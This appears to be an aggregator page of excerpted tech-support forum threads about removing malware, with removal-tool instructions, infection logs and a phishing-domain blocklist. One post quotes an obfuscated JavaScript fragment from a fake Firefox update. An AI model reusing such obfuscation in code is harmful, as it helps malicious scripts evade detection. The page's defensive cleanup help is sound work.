QUESTION: Is Webroot always going to detect malware if there are boxes that will have to be unchecked to keep it from downloading stuff you don't want?
I never had any problem running this software on the other computer. I always unchecked those boxes.
Thanks.
 

More replies
Relevance 79.13%

Please check the attached logs.

As for "Clearly describe in detail the problems you are having and how long ago they started. Think about what you were doing at the time. Advice would be appreciated." -- This is a friend's computer, so I'm not sure how long it's been having problems. I saw one of the earlier detected issues was related to some free chess game. That was installed (according to Control Panel) in March.

Thank you.
 

Answer:Detection programs found trojans and malware

Now download The Avenger by Swandog46 to your Desktop.

Please disable all anti-virus and anti-spyware programs while we do the following (re-enable when you are finished):

Run C:\MGtools\analyse.exe by double clicking on it (Note: if using Vista, don't double click, use right click and select Run As Administrator). This is really HijackThis (select Do a system scan only) and select the following lines but DO NOT CLICK FIX until you exit all browser sessions including the one you are reading in right now:




O2 - BHO: (no name) - {02478D38-C3F9-4efb-9B51-7695ECA05670} - (no file)
O3 - Toolbar: (no name) - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - (no file)
O3 - Toolbar: (no name) - {CCC7A320-B3CA-4199-B1A6-9F516DD69829} - (no file)
O4 - HKCU\..\Run: [dsvect] "C:\Users\Owner\AppData\Roaming\dsvect.dll",IncrementalDecoder
O4 - HKCU\..\Run: [piroxr] "C:\Users\Owner\AppData\Roaming\piroxr.dll",set_invert_alpha
O4 - HKCU\..\Run: [vcspiz] "C:\Users\Owner\AppData\Roaming\vcspiz.dll",Warn
O4 - HKCU\..\Run: [tatmac] "C:\Users\Owner\AppData\Roaming\tatmac.dll",GetCode
O4 - HKCU\..\Run: [uapip] "C:\Users\Owner\AppData\Roaming\uapip.dll",vGetTokenA
O4 - HKCU\..\Run: [rdpir] "C:\Users\Owner\AppData\Roaming\rdpir.dll",Mem_Realloc
O4 - HKCU\..\Run: [mapad] rundll32.exe "C:\Users\Owner\AppData\Roaming\mapad.dll",_RepeatClick to expand...

After clicking Fix, exit HJT.

Now copy just the bold text below ... Read more

1 more replies
Relevance 79.13%

C:\WINDOWS\System32\smss.exeC:\WINDOWS\system32\csrss.exeC:\WINDOWS\system32\winlogon.exeC:\WINDOWS\system32\services.exeC:\WINDOWS\system32\lsass.exeC:\WINDOWS\system32\svchost.exeC:\WINDOWS\system32\svchost.exeC:\WINDOWS\system32\svchost.exeC:\Program Files\Panda Security\Panda Antivirus Pro 2010\TPSrv.exeC:\WINDOWS\System32\svchost.exeC:\WINDOWS\System32\svchost.exeC:\Program Files\Tall Emu\Online Armor\oasrv.exeC:\PROGRAM FILES\PANDA SECURITY\PANDA ANTIVIRUS PRO 2010\WebProxy.exeC:\Program Files\Lavasoft\Ad-Aware\aawservice.exeC:\WINDOWS\Explorer.EXEC:\WINDOWS\system32\spoolsv.exeC:\WINDOWS\System32\svchost.exeC:\WINDOWS\System32\spool\DRIVERS\W32X86\3\E_FATIAFA.EXEC:\Program Files\Java\jre6\bin\jusched.exeC:\Program Files\Tall Emu\Online Armor\oaui.exeC:\WINDOWS\system32\svchost.exeC:\WINDOWS\system32\ctfmon.exeC:\Program Files\Java\jre6\bin\jqs.exeC:\Program Files\PeerGuardian2\pg2.exeC:\Program Files\Spybot - Search & Destroy\TeaTimer.exeC:\Program Files\Panda Security\Panda Antivirus Pro 2010\PsCtrls.exeC:\Progra... Read more

Answer:Virus/Malware not being detected by Spyware Detection

Hello and welcome to Bleeping Computer.We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.My name is Syler, I will be helping you to solve your Malware issues. Whilst I am helping you, I wouldbe grateful if you would note the following: Please do not run other tools or scans unless I ask you to and follow all the steps I give you, in order.
Copy and paste all logs requested in you reply, Do not attach them unless asked too.
If you don't know or understand something, please don't hesitate to say or ask before you proceed with my instructions.
Please continue to work with me, until I tell you your machine appears to be clean. Absence of symptoms does not mean that everything is clear.
If I do not hear back from you within 5 days of my last post, then this topic will be closed.Please download Malwarebytes' Anti-Malware from HereNote: If you already have Malwarebytes' Anti-Malware, just update then run it.Double Click mbam-setup.exe to install the application.Make sure a checkmark is placed next to Update Malwarebytes' Anti-Malware and Launch Malwarebytes' Anti-Malware, then click Finish.If an update is found, it will download and install the latest ve... Read more

2 more replies
Relevance 79.13%

somehow i started to get "Security Center Alert" pop ups (about 6 or 7 different messages) and some trojan called Malware Defense started to self load itself. the SCA pop ups dont allow anything but "enable protection" which doesnt do anything (the Keep Blocking and Unblock buttons are inaccessible)...

i am unable to clear it with AVG 8.5. i found some OTHER malware stuff that i assume was cleared. it took about 35 minutes to run the scan...

i also get a "Web page unavailable while offline" pop up asking if i want to connect or stay offline. obviously this is fraudulent because im online on this forum. it comes on for about 10-13 seconds then blinks off. then it comes back on again...

i have SuperAntiSpyware on my computer but it wont run (SAS has encountered a problem and needs to shutdown etc). i downloaded Malwarebytes and it took a couple of attempts for it to run the setup. i got it installed but it wont run either (no start)...

some of the SCA pop ups list Virus.Win32.Hala.a, Virus.Win32.Gpcode.ak, Trojan.Win32.Agent.dcc then there is also Net-Worm.Win32.DipNet.d of course i dont even know if these are legitimate notifications. sometimes i get the balloon pop up on the system tray that says something about Chin09 or something. it doesnt stay popped up long enough to read it all...

Mozilla Firefox (latest version)
XPhome

what a colossal pain in the backside....

Answer:"security alerts" "malware detection" and other junk

Try the guide at http://www.bleepingcomputer.com/virus-remo...malware-defenseLet me know your results

13 more replies
Relevance 79.13%

hi everyone,
the past months it has happened twice that someone got access to my facebook account also after changing my password.
it didn't feel safe so I followed the procedures as written in the removal sections.
openly.. yes.. I'm guilty of having used software downloaded by p2p networks as has someone who rented my house and pc for a year or so. I always used the ones 'verified' or very positively commented on but maybe this has been the most naive.. :-o
I uninstalled and deleted all from my system still it doesn't solve the issues..
I read the warnings in this section so I understand if help will not be given.
would someone still be prepared to do so I have some remarks with the tests.

-after the rogue killer scan a ssdt hook info appeared
-during the mbam scan avira came with a warning that adware screening had been blocked.

my humble thanks to anyone who would like to give me a helping hand to solve this..
 

Answer:malware help needed after detection of 'stolen' passwords

Please download OTM by Old Timer and save it to your Desktop.

Run OTM.exe by double clicking on it (Note: if using Vista, Win7 or Win8, don't double click, use right click and select Run As Administrator).
Copy the lines from the below codebox to the clipboard by highlighting ALL of them and pressing CTRL + C
(or, after highlighting, right-click and choose Copy): Do not include the word Code: which is just a title line of
the code box

Code:

:Processes
explorer.exe


:Services
APNMCP
gupdate
gupdate

:Files
C:\Program Files\AskPartnerNetwork
C:\Program Files\Movies Toolbar
C:\Program Files\Mozilla Firefox\browser\searchplugins\Ask.xml
C:\Program Files\VNT\
C:\ProgramData\APN
C:\ProgramData\AskPartnerNetwork
C:\Users\gebruiker\AppData\Local\VNT\
C:\Users\gebruiker\AppData\Roaming\Mozilla\Firefox\Profiles\hyc6xoox.default\searchplugins\Ask.xml
C:\Users\gebruiker\AppData\Local\WebPlayer\FLV Player\scripts\web_player\web_player.js
C:\Users\gebruiker\AppData\Roaming\Mozilla\Firefox\Profiles\hyc6xoox.default\searchplugins\babylon.xml
C:\Users\gebruiker\AppData\Roaming\Mozilla\Firefox\Profiles\hyc6xoox.default\searchplugins\delta.xml
C:\ProgramData\Wincert
C:\Program Files\Movies Toolbar\SafetyNut
C:\Users\gebruiker\AppData\Roaming\Search Protection
c:\program files\common files\spigot
C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-3979874650-15... Read more

3 more replies
Relevance 79.13%

Earlier on today my computer locked up, I rebooted and had trouble logging in(wouldn't show the username/password), finally rebooting a couple more times I got into Windows and checked out the proceses and b.exe was there.

I've tried running malwarebytes anti-malware, super anti spyware, combofix and none of them will open. The only other thing it's really doing is redirecting google searches.

here is the DDS log

============== Running Processes ===============

C:\WINDOWS\system32\svchost -k DcomLaunch
svchost.exe
C:\WINDOWS\System32\svchost.exe -k netsvcs
svchost.exe
svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\WgaTray.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Internet Explorer\Iexplore.exe
C:\PROGRA~1\AVG\AVG8\avgtray.exe
C:\WINDOWS\system32\RUNDLL32.EXE
C:\WINDOWS\system32\Rundll32.exe
C:\Program Files\Java\jre1.6.0_07\bin\jusched.exe
C:\WINDOWS\msb.exe
C:\Program Files\Windows Live\Messenger\msnmsgr.exe
C:\Program Files\Messenger\msmsgs.exe
svchost.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\PROGRA~1\AVG\AVG8\avgwdsvc.exe
C:\WINDOWS\System32\svchost.exe -k HPZ12
C:\WINDOWS\system32\nvsvc32.exe
C:\WINDOWS\... Read more

Answer:google redirects, can't run any malware detection programs

Hi,

I will handle your log. As I am in training all my answers have to be approved by my Coaches.
I hope you understand.

I'll get back to you as soon as is possible.

6 more replies
Relevance 79.13%

My fiancee's aunt and uncle are raising a 17 year old grandson who is famous for infecting their computer (which gets handed to me to fix). They are usually NASTY viruses which require me to seek help on the internet for. No doubt the result of him going to pornographic sites as I notice he erases the browser history quite religiously. (I've been through this with my own teenage son and a teenage stepson as well!)

At any rate this one really takes the cake. Not only did I clean a horrific virus off their computer last time but installed McAfee AV (I told them to get the internet security suite but all they got was the AV) cleaned the computer with malware bytes (but uninstalled this program after using it), AdAware, and Spybot S&D (left those two on the system and showed them how to use them, not that they did), got all the Windows updates loaded, and set up their system for automatic updates and scans.

Now I get it back no more than 2 months later like this.....

Upon boot up there is immediate windows security alerts which tells me the computer is infected and would I like to start my anti-virus program now? I ignored those. Meanwhile error messages are popping up one after another telling me that every file in creation is infected with a virus (including files associated with running McAfee).

Attempting to open McAfee up directly (by-passing the "click here" baloney) with this mess going on does nothing but earn me more error messages regarding... Read more

Answer:Nasty malware infection evades all detection

I used this post earlier. At the current time I am a huge fan of rkill, due to it seems to give you a much better working environment for detection and removal.Just to be clear first and foremost. I'm not a regular technician on this forum, but i think this may be of some assistanceIf you have a secondary computer to download programs through put them on a flash drive and transfer themFirst you should download rkill from a known good source.While downloading just to be safe, you may want to rename the files from something other than rkill.http://download.bleepingcomputer.com/grinler/rkill.comhttp://download.bleepingcomputer.com/grinler/rkill.exehttp://download.bleepingcomputer.com/grinler/rkill.pifhttp://download.bleepingcomputer.com/grinler/rkill.scrYou will also want to download malewarebytes from a known good sourceI would just use http://www.malwarebytes.org/When running rkill on windows 7 or vista you will need to right click and use the "run as administrator" option.Try running rkill a few times, the dos box should pop up saying it is terminating known malware processes.If the exe does not work, try the com version, but make sure to run as AdministartorOnce rkill successfully runs, a notepad file should open up with what it stopped.Now, don't restart the computer.Remove malewarebytes if its installed, and reinstall it.Update to the latest definitions.To be on the safe side i would suggest running a full system scan.Any entires it finds, remove them.At... Read more

6 more replies
Relevance 79.13%

Hi, I seem to be having some issues on my pc after my previous anti virus, Kaspersky 7.0, detected an infection of some sort and aparently removed it; however, after this issue kaspersky was unable to update, so i uninstalled it because i wasnt really liking it and i instaled ESET Nod32 wich found no threats but the next day it couldnt update either. that same day a scheduled windows update came up with a prompt stating that it was unable to update and windows defender did the same. Also the home page on my IE is Google but it seems diferent in the sense that when i click on any link in Google a new page is opened and sometimes its a completely diferent page than whatever i was searching for on Google, often an unsafe site that opens up multiple other pages. this doesnt hapen with every link and clicking the same link afterwards will usualy go to the page i was expecting. this seems to me like an obvious malware problem but it seems so random. Also, and im not sure if this is related, but my pc has 6 usb slots and two of them are usb 1.0 while four are usb 2.0 however, one of the 2.0 ones today wasnt reading the printer attached to it and when i switched it with a PSP the device was recognized but a prompt came up stating that the device might work slowly because it was designed for a 2.0 slot. i have connected the PSP to this slot before and it was instantly recognized by what i believe to have been, untill today, a usb 2.0 slot. i dont know if this is related to the other ... Read more

Answer:Seemingly unrelated issues after malware detection

bump, please

1 more replies
Relevance 79.13%

Hello everybody!
My security software (Bitdefender Internet Security 2014) detected a virus inside the .exe file of JRT (Virus Name: MIDAS3) and removed it from my system immediately.
Virus Total report also shows some malware detection coming from other AV software.
BIS 2014 usually doesn't make blunders from this point of view, since it's known to have a very low FP rate detection. What do you make of it, dudes?
It's strange because previous JRT versions never gave me any trouble, meaning they were always clean.
It would be great if someone of you could report my comment to the JRT developer, in order to clear up this issue once and for all.
 
Thanks in advance.
 
 

Answer:Junkware Removal Tool (JRT) malware detection!!

It's obviously false positive.
Report it at BIS forum.

2 more replies
Relevance 78.31%

I've learned about the vulnerabilities of downloads, so I've been scanning new downloads, especially with VirusTotal scan. When you see one or two or three hits, how do you know whether this is one or a few services picking up a real malware item most are missing, or whether it is another example of the unquestionably large phenomenon of false positive detections?

I know Nir's items like WebBrowserPassView are not malware. I know when ClamAV is the only malware detector on the list, it's likely false positive. I know now, from ClamAV's own forum, that PUAs are probably false positives.

I downloaded AppRemover and when doing the VT scan, it got hits from TrendMicro-HouseCall--"TROJ_GEN.F47V0414" and Symantec--"WS.Reputation.1" I have read that Norton is especially bad at labelling good products malware. I don't know about TrendMicro.

I have learned some things, but clearly there's so much more to know. Where does one read up and learn about this?
 

Answer:What can we do about distingushing true malware detection & false positives?

Use common sense, if it's flagged, it's for a reason; Nir Sofer's tools, and some by Mark Russinovich, have been used by hackers in the past.

I'm really not sure where the 'best' place is to learn about these things, most A/V companies are pretty vague about details (some tend towards scaremongering in my book).

Most A/V's use some kind of 'predictive' heuristics/reputation algorithm - basically, it guesses based on previous records/reports etc.

Firstly, explore and study all the options in Virustotal; More details, Additional information and Comments, if there are any.

As an example, when there are a high number of A/V's flagging a file as 'gen', 'like ... ', 'pupack', 'pack', 'heuristic', 'suspicious', etc. but few or none with a definitive virus/malware label, it may be a benign file packaged by a tool that has been used by hackers to compress their malware.

The below file when unzipped contained 3 files, only one of those was flagged - by only one A/V - and that was a 'gen' detection. *Better to be safe than lose your ID/Paypal etc. though - if in doubt - don't touch it!
 

1 more replies
Relevance 78.31%

Hey folks,
 
As the title states I ran a routine AVG scan today and at around the 45% mark it came up with 11 detections, then a pop up immediately appeared saying Windows would shut down in one minute and I should close all programs. The PC then froze forcing me to do a manual hard reset. I've run Malwarebytes and that completed but showed nothing amiss. I've also tried re-installing AVG using a random name for the exe file. This made no difference and the same thing occured -11 file detections, warning, freeze. The only thing I've done recently that's out of the ordinary is install Geforce Experience (basically a graphic driver updater) manually after the auto-update failed and appeared to damage the program. This appeared to be as expected. I'm running windows 10, fully updated. I'm now at a bit of a loss as to how to proceed so any advice would be useful. Thanks

Answer:Windows 10 forced shutdown on malware/virus detection

Just an update. I managed to get Avast (Free) anti virus to install using a completely random name for the exe file. It turned up nothing when I ran it (although I'm not convinced it's the best anti-virus out there so still not convinced I've got a clean bill of health). I also installed spybot and that came up clean apart from the usual cookies and core registery files it likes to be rid of. 

0 more replies
Relevance 78.31%

Vista Ult. 32-bit, core2 2ghz proc, 2GB ram.
With all antivirus/etc uninstalled and rebooted,

dds.scr initially runs but does not scan or produce logs even after 10 minutes and locks up the machine.

Arc.txt log is 3.87MB and will not attach because its too big, yes it is a txt file.

aswMBR.txt is attached.

Please advise,
Doug
 aswMBR.txt   1.77KB
  1 downloads

Answer:Unknown Virus/Malware Defies Detection/Removal

Hello and welcome to Bleeping ComputerWe apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. If you are unable to create a log because your computer cannot start up successfully please provide detailed information about the Windows version you are using: What we in particular need to know is version, edition and if it is a 32bit or a 64bit system. [/b]If you are unsure about any of these caracteristics, just let us know and we'll help you figuring it out. Please also tell us if you have your Windows CD/DVD handy.Please include a clear description of the problems you're having, along with any steps you may have performed so far.Please refrain from running tools or applying updates other than those we suggest while we are cleaning up your computer. The reason for this is so we know what is going on with the machine at any time. Some programs can interfere with others and hamper the recovery process.Even if you have already provided information about y... Read more

2 more replies
Relevance 78.31%

-----------------------------------------------------------------------------------------------------------





http://pcsl.r.worldssl.net/report/android/pcsl_android_malware_detection_201411_en.pdf
 

Answer:PCSL: Android Malware Detection Test 2014 Nov.

I just got an 6 months free key of Bitdefender mobile Security. Thanks to malwaretips, I don't have to pay for Security Softwares for next 1 year . Though I have a very bad luck when it comes to Giveaway's but some cool members of malwaretips always help me with the keys.
 

1 more replies
Relevance 78.31%

Avast constantly shows the following pop up detection messages
 
Malware blocked
 
infection : win32:malware-gen
 
and
 
infection : win32:trojan-gen
 
Threat was detected and blocked when file was created or modified
 
Have ran full system and boot time scan : infections were found and removed but message continues to pop up
 
Please help.
 
 
DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 9.0.8112.16421  BrowserJavaVersion: 10.17.2
Run by owner at 20:41:56 on 2013-03-27
Microsoft Windows 7 Home Premium   6.1.7600.0.1252.44.1033.18.3999.2394 [GMT 0:00]
.
AV: avast! Antivirus *Enabled/Updated* {2B2D1395-420B-D5C9-657E-930FE358FC3C}
SP: avast! Antivirus *Enabled/Updated* {904CF271-6431-DA47-5FCE-A87D98DFB681}
SP: Windows Defender *Enabled/Outdated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
============== Running Processes ===============
.
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_ccf0dd3cb081af84\STacSV64.exe
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k NetworkService
C:\Program Files\Alwil Software\Avast5\AvastSvc.exe
C:\Windows\system32\Dwm.ex... Read more

Answer:Avast constant detection message - Malware Blocked

Hi and Welcome!!

My name is Jeff. I would be more than happy to take a look at your malware results logs and help you with solving any malware problems you might have. Logs can take a while to research, so please be patient and know that I am working hard to get you a clean and functional system back in your hands. I'd be grateful if you would note the following:
The fixes are specific to your problem and should only be used for the issues on this machine.It's often worth reading through these instructions and printing them for ease of reference.If you don't know or understand something, please don't hesitate to say or ask!! It's better to be sure and safe than sorry.Please reply to this thread. Do not start a new topic.If you happen to have a flash drive/thumb drive please have that ready in the event that we need to use it.Please be sure to subscribe to this topic so that you can see when there are new responses.IMPORTANT NOTE : Please do not delete, download or install anything unless instructed to do so.
DO NOT use any TOOLS such as Combofix or HijackThis fixes without supervision. Doing so could make your system inoperable and could require a full reinstall of your operating system and losing all your programs and data.

Having said that.... Let's get going!!


Please download aswMBR to your desktop.Double click the aswMBR icon to run it.Click the Scan button to start scan.If you are asked to update the Avast Virus database please allow it to do so.When it finishes, p... Read more

18 more replies
Relevance 78.31%

Ran a MBAM scan when I seemingly downloaded a dubious file. Result was a Malware.Packer.CV and Norton power eraser found a file in System 32 it was unable to delete.
 
The file it found was wqlhlnn.sys
 
Help is much appreciated at the earliest.
 
EDIT: I haven't launched the .exe file the malware was found in when it got detected.

Answer:Malware Packer and detection by Norton Power Eraser

Can you post the entire file location path?
 
Reason I ask is you can boot into safe mode and paste the entire file location into File Assassin it should delete it.
https://www.malwarebytes.org/fileassassin/

12 more replies
Relevance 78.31%

I just want to hear others thoughts on this subject. I have read a couple of articles that state the possibility of Anti Virus software providing and cleaning viruses that were never there just to appear to be doing its job. I personally think that is a stretch. I mean what development company has time to provide for this kinda functionality?

Anyway, What do you think??
 

Answer:False Hits on Virus and Malware detection software

6 more replies
Relevance 78.31%

Dear friends,
We all consider MBAM as a Holy cow and mostly accept it's results! I have been having doubts since ,say, one year that MBAM may be missing which a-squared free and Digital Patrol are catching. Today, i visited the Malwarebytes forum and was aghast at the huge collection of malware missed by it. In the discussion that ensued there, one of the "experts" said that only new threats are included in the database and that can be the cause of the whole miss! Finally the Moderator agreed to check out the 117 mb of missed malware presented by the @op! I am providing a link for perusal : http://forums.malwarebytes.org/index.php?showtopic=50460
 

Answer:Detection abilities of mbam(malwarebytes anti-malware)?

9 more replies
Relevance 77.49%

What would the best software to meet these requirements for servers and clients running Windows 2003/XP/Vista:
Antivirus
Spyware Detection
Malware Detection
Adware Detection
Small System Footprint on space and resources
Updates sent from Server to all clients
Controlled by server
Integration with Microsoft Exchange
Please give me your best suggestions, thanks.
 

Answer:Best network Virus/Spyware/Malware/Adware Detection/Removal

Kaspersky or Esets NOD32..they both produce enterprise versions and have optional Exchange server modules.
 

10 more replies
Relevance 76.67%

I've got a really strange problem, that makes it really difficult to post any diagnostic information about the problem. I've tried running HiJackThis, MalwareBytes anti-malware, Trendnet housecall online scanner, GMER, ad-aware, Spybot S&D, RootRepeal and dds.scr. The results are pretty much the same for all of these programs. The scan/analysis starts, sometimes it gets partway through scanning, and then the application window gets closed. After this happens, in the case of .exe files, the resulting program is rendered useless, in that further attempts to launch it result in a "Windows cannot access the specified device, path or file. You may not have the appropriate permissions to access the item." and you also cannot rename, or delete the file.

Trend-net housecall is also pretty interesting, in that it runs inside the browser, and after it was terminated (part way through the scan) iexplore.exe now exhibits the same error in not being able to launch. This not being able to launch persists across reboots also. I then installed firefox.exe on the system, was using it for a brief period, tried trend-net housecall and now it too is showing the error in not being able to launch.

dds.scr is able to be to be re-launched, and it brings up the black command window type screen, but never brings up the notepad windows. It seems unaffected by the termination behaviour, and is able to be re-launched.

I was able to run A2 anti-trojan, and do have a log of what it... Read more

Answer:Strange malware issue - unable to use detection tools or virus scanners

Hi Thomas Lovie,Welcome to BC HijackThis forum. I am farbar. I am going to assist you with your problem.Please refrain from making any changes to your system (updating Windows, installing applications, removing files, etc.) from now on as it might prolong handling your log and make the job for both of us more difficult.I share your academic interest. So let's have a go at it.Download and run Win32kDiag: Download Win32kDiag from any of the following locations and save it to your Desktop. Download Win32kDiag (Win32kDiag.exe) - #1 Download Win32kDiag (Win32kDiag.exe) - #2 Download Win32kDiag (Win32kDiag.exe) - #3 Double-click Win32kDiag.exe to run Win32kDiag and let it finish. When it states "Finished! Press any key to exit...", press any key on your keyboard to close the program. Double-click on the Win32kDiag.txt file that is located on your Desktop and post the entire contents of that log as a reply to this topic.Next......

Also post the A2 anti-trojan log.

30 more replies
Relevance 70.93%

A while back, I was able to download and install a list of websites that should be blocked (ie porn, spyware sites) right into IE6. I can not for the life of me find what it was called.

Does anyone know, or know of something similar? I would like to block sites from being accessed (without using parental controls if possible).

Thank you!
Erin
 

Answer:Blacklist for websites in IE?

spyware blaster does some of what you want.

SpywareBlaster 3.3
 

2 more replies
Relevance 70.52%

In September 2016, we started adding to Microsoft Malicious Software Removal Tool (MSRT) a malware suite of browser modifiers and other Trojans installed by software bundlers. We documented how the malware in this group install other malware or applications silently, without your consent. This behavior ticks boxes in the evaluation criteria that Microsoft Malware Protection Center (MMPC) uses for identifying unwanted software. Installing software without your permission, interaction, or consent is considered unwanted behavior because that can take away the choice you should have in determining what applications to install on your computer.

By October 2016, MSRT detected and removed most of the malware families in this suite:
Sasquor, which changes browser search and homepage settings to circumvent the browser?s supported methods and bypass your consent, and can install other malware like Xadupi and Suweezy
SupTab, which also changes browser search and homepage settings, and installs services and scheduled tasks that regularly install additional malware
Suweezy, which attempts to modify settings for various antivirus software, including Windows Defender, creating a significant danger to your computer?s overall security
Xadupi, which registers a service that regularly installs other apps, including Ghokswa and SupTab, and is ostensibly an update service for an app that has some user-facing functionality: CornerSunshine displays weather information on the taskbar, WinZipp... Read more

More replies
Relevance 69.7%

AVG has for the 2nd time reported malware found in the destination relative to Google Update and Google Talk.

Until resolved, these programs have been firewalled.

Also, i think my network is being infiltrated where users can remotely see my screen activity.

1st the malware issue
then 2nd the network issue

Answer:Malware detection in Google Update and Google Talk

Hi-

For Malware issues you should head over to the security section:

Please follow these instructions in your post: http://www.techsupportforum.com/f50/...lp-305963.html

Once they clear your system you may return here for any further questions/ support. Please note that the security section is extremely busy and it may take some time before they can get to your post. You may post the information gathered in these steps here: http://www.techsupportforum.com/f50/

Regards,

Mark

2 more replies
Relevance 68.47%

Hello everyone,

I have a young teenager and every attempt that I have tried to block adult websites from them, have failed. I want to know if there is a program out there that can block/blacklist any and all adult websites from the web browsers that we use. We use IE and FireFox. This is a big concern for me, due to the fact that it's not apporiate for them to see.

Any help with this subject would be GREATLY appriecated.

Oh....I am using Windows XP Home Edition SP2.

Thank You.
 

Answer:Wanting to block/blacklist all adult websites

8 more replies
Relevance 67.65%

Sharing this here in case anyone is interested in adding a Black List to their Firefox to block trouble spots on the internet from ever being navigated to from Firefox.I added BlockSite add-on to my Firefox browsers on my systems and created a short blacklist that I am going to build up and add to.Here is the add-on I am using that works well. Easy to set up and manage: https://addons.mozilla.org/en-US/firefox/addon/blocksite/Here is my current black list:Quote[BlockSite]*eekumyoutube**meihitravelfeeder**liirawynagrodzenia**eatadresumedropbox*I started use of this BlockSite add-on because some computers both at home and elsewhere have had Phishing Attacks trying to get people to download and run a firefox-update.js ranging in sizes of ( 6.5kb, 338kb, and 482kb ). Screenshot below shows an example of this Phishing Attack.Worst of all is that MalwareBytes Free edition, Microsoft Security Essentials, and McAfee Free edition all say that these .js files are safe, no problems detected. Yet looking at the source code in the script it has malicious intent to infect Firefox.Here is a code snippet from a 6.5kb fake firefox update:Code: [Select]var lubjgros=odubo+lni+ksfyw+fivu+cqe+asq;
   function loa(a){return a;};
   var rrr="ev";
   var sir="Scr"+"ipt"+"ing."+loa("Di"+"ct"+loa("i"+"o"+"n"+"a"+"r"+"y"));
  &nbs... Read more

More replies
Relevance 67.65%

Sharing this here in case anyone is interested in adding a Black List to their Firefox to block trouble spots on the internet from ever being navigated to from Firefox.I added BlockSite add-on to my Firefox browsers on my systems and created a short blacklist that I am going to build up and add to.Here is the add-on I am using that works well. Easy to set up and manage: https://addons.mozilla.org/en-US/firefox/addon/blocksite/Here is my current black list:Quote[BlockSite]*eekumyoutube**meihitravelfeeder**liirawynagrodzenia**eatadresumedropbox*I started use of this BlockSite add-on because some computers both at home and elsewhere have had Phishing Attacks trying to get people to download and run a firefox-update.js ranging in sizes of ( 6.5kb, 338kb, and 482kb ). Screenshot below shows an example of this Phishing Attack.Worst of all is that MalwareBytes Free edition, Microsoft Security Essentials, and McAfee Free edition all say that these .js files are safe, no problems detected. Yet looking at the source code in the script it has malicious intent to infect Firefox.Here is a code snippet from a 6.5kb fake firefox update:Code: [Select]var lubjgros=odubo+lni+ksfyw+fivu+cqe+asq;
   function loa(a){return a;};
   var rrr="ev";
   var sir="Scr"+"ipt"+"ing."+loa("Di"+"ct"+loa("i"+"o"+"n"+"a"+"r"+"y"));
   va... Read more

Answer:Black List to Block Websites - Firefox - Please add others to blacklist

Here is the latest blacklist I have if anyone is using the BlockSite Addon:Just copy and paste this below into a text file and import it to the Block Site Addon... These are Firefox Fake Update Phishing sites that have been found, and the phishing seems to originate through facebook somehow. Computer shows clean with malwarebytes and avg virus scan.Code: [Select][BlockSite]
*eekumyoutube.*,Phishing Attacker
*meihitravelfeeder.*,Phishing Attacker
*liirawynagrodzenia.*,Phishing Attacker
*eatadresumedropbox*,Phishing Attacker
*phaigfinancial-hub.*,Phishing Attacker
*vooshortakweb.*,phishing attack
*ijualhalfpintgentleman.*,phishing attack
*nuriuek-online.*,phishing attack

3 more replies
Relevance 63.96%
Question: Detection

Hi  a small business i do IT work for were hit with a Crypto virus zendrz file, its now removed and all data restored, im just wondering, whats the best AV or tool to detect and stop these infections before they get on to the system

Answer:Detection

The best defensive strategy to protect yourself from malware and ransomware (crypto malware) infections is a comprehensive approach. Make sure you are running an updated anti-virus and anti-malware product, update all vulnerable software, use supplemental security tools with anti-exploitation features capable of stopping (preventing) infection before it can cause any damage, close RDP if you do not need it, use secure passwords and routinely backup your data...then disconnect the external drive when the backup is completed. If you must use RDP, the best way to secure it is to either whitelist IP's on a firewall or not expose it to the Internet. Put RDP behind a firewall, only allow RDP from local traffic, setup a VPN to the firewall and enforce strong password policies, especially on any admin accounts or those with RDP priveledges.Use an Anti-Exploit Program to Help Protect Your PC From Zero-Day AttacksThe smartest way to stay unaffected by ransomware? Backup!For more suggestions to protect yourself from ransomware infections, see my comments (Post #2) in this topic...Ransomware Avoidance.BTW...The .zendrz extension appended to the end of the encrypted data filename is a variant of Globe Ransomware which typically leave files (ransom notes) named How to restore files.hta, Important Information.hta.There is an ongoing discussion in this topic where you can post comments, ask questions and seek further assistance. Other victims have been directed there to share information, ex... Read more

more replies
Relevance 63.96%
Question: IP detection

I have purchased a Idea
pad U310, and i have troubles when change the place to conect to a wireless network
In my office i must to input the IP every time , in my house i can't conect to my wireless network and i must change the configuration again.
What can I do to solve this??

Configuraci¢n IP de Windows

Nombre de host. . . . . . . . . : usuario-PC
Sufijo DNS principal . . . . . :
Tipo de nodo. . . . . . . . . . : h¡brido
Enrutamiento IP habilitado. . . : no
Proxy WINS habilitado . . . . . : no
Lista de b£squeda de sufijos DNS: interno.rqc.com

Adaptador de Ethernet Conexi¢n de *rea local:

Estado de los medios. . . . . . . . . . . : medios desconectados
Sufijo DNS espec¡fico para la conexi¢n. . :
Descripci¢n . . . . . . . . . . . . . . . : Realtek PCIe FE Family Controller
Direcci¢n f¡sica. . . . . . . . . . . . . : 04-7D-7B-B7-9C-98
DHCP habilitado . . . . . . . . . . . . . : s¡
Configuraci¢n autom*tica habilitada . . . : s¡

Adaptador de LAN inal*mbrica Conexi¢n de red inal*mbrica:

